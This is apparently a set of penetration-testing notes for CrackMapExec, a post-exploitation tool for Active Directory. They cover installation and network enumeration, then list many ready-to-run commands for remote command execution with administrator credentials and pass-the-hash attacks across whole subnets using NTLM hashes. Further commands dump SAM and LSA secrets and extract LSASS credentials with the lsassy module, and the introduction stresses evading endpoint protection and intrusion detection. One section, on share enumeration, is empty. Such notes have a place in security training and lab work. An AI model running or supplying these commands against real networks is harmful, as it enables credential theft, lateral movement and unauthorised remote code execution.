
CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.


-- Installation --

apt-get install -y libssl-dev libffi-dev python-dev-is-python3 build-essential
git clone https://github.com/mpgn/CrackMapExec
cd CrackMapExec
install


-- Network Enumeration --

crackmapexec 192.168.10.0/24


-- Command Execution --

crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec


-- Checked for logged in users --

crackmapexec 192.168.215.104 -u 'Administrator' -p 'Passw0rd' --lusers


-- Using Local Auth --

crackmapexec 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth


-- Enumerating Shares --




-- Pass Attacks --

crackmapexec smb 192.168.57.0/24 -u administrator -d marvel.local -p Password1
crackmapexec smb 192.168.57.0/24 -u administrator -d MARVEL -p Password1 --sam
crackmapexec smb 192.168.57.0/24 -u administrator -d MARVEL -p Password1 --shares

crackmapexec smb 192.168.57.0/24 -u administrator -H eb7126ae2c91ed56dcc475c072863269 --local
crackmapexec smb 192.168.57.0/24 -u administrator -H eb7126ae2c91ed56dcc475c072863269 --local-auth
crackmapexec smb 192.168.57.0/24 -u "Frank Castle" -H c46b9e588fa0d112de6f59fd6d58eae3 --local-auth

crackmapexec smb 192.168.57.0/24 -u administrator -H eb7126ae2c91ed56dcc475c072863269 --local-auth --sam
crackmapexec smb 192.168.57.0/24 -u administrator -H eb7126ae2c91ed56dcc475c072863269 --local-auth --shares
crackmapexec smb 192.168.57.0/24 -u administrator -H eb7126ae2c91ed56dcc475c072863269 --local-auth --lsa
crackmapexec smb 192.168.57.0/24 -u administrator -H eb7126ae2c91ed56dcc475c072863269 --local-auth -M lsassy

crackmapexec smb -L

cmedb >
cmedb > help
cmedb > hosts
cmedb > creds







